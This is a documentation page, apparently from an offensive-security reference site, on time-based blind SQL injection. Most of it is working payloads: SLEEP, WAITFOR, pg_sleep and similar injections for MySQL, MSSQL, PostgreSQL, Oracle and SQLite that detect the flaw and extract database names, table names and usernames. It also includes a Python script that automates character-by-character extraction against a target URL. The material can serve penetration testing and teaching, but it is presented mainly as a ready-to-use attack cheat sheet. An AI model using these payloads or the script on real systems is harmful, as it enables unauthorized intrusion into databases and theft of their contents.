Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

No visible output difference. Inject conditional SLEEP/WAITFOR — measure response time to infer true/false. Slowest technique but works when boolean blind doesn’t.

Detect

MySQL

' AND SLEEP(5)-- -                    → 5 sec delay = injectable
' AND IF(1=1,SLEEP(5),0)-- -         → 5 sec delay
' AND IF(1=2,SLEEP(5),0)-- -         → No delay

MSSQL

'; WAITFOR DELAY '0:0:5'-- -         → 5 sec delay
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -

PostgreSQL

'; SELECT pg_sleep(5)-- -
' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE pg_sleep(0) END)-- -

Oracle

' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- -

SQLite

' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))-- -

Extract Data — MySQL

Database Length

' AND IF(LENGTH(database())=5,SLEEP(3),0)-- -

Database Name

' AND IF(ASCII(SUBSTRING(database(),1,1))>100,SLEEP(3),0)-- -
' AND IF(ASCII(SUBSTRING(database(),1,1))=116,SLEEP(3),0)-- -

Table Names

' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>100,SLEEP(3),0)-- -

Dump Data

' AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1))=97,SLEEP(3),0)-- -

Extract Data — MSSQL

'; IF (ASCII(SUBSTRING(DB_NAME(),1,1))>100) WAITFOR DELAY '0:0:3'-- -
'; IF (ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>100) WAITFOR DELAY '0:0:3'-- -

Extract Data — PostgreSQL

' AND (SELECT CASE WHEN ASCII(SUBSTRING(current_database(),1,1))>100 THEN pg_sleep(3) ELSE pg_sleep(0) END)-- -

Automation Script (Python)

import requests
import time

url = "http://TARGET/page"
result = ""

for pos in range(1, 50):
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        payload = f"' AND IF(ASCII(SUBSTRING(database(),{pos},1))>{mid},SLEEP(2),0)-- -"
        start = time.time()
        r = requests.get(url, params={"id": payload})
        elapsed = time.time() - start
        if elapsed >= 2:
            low = mid + 1
        else:
            high = mid - 1
    if low > 126:
        break
    result += chr(low)
    print(f"[+] {result}")

print(f"Result: {result}")

Tips

  • Use 2-3 sec delay (not too long, not too short)
  • Network latency can cause false positives — test baseline first
  • Binary search reduces requests per character (~7 vs ~95)
  • Use --technique=T --time-sec=3 in SQLmap

Quick Reference

DatabaseSleep Function
MySQLSLEEP(N) or BENCHMARK(N,expr)
MSSQLWAITFOR DELAY '0:0:N'
PostgreSQLpg_sleep(N)
OracleDBMS_PIPE.RECEIVE_MESSAGE('a',N)
SQLiteLIKE('ABC',UPPER(HEX(RANDOMBLOB(N))))

Sources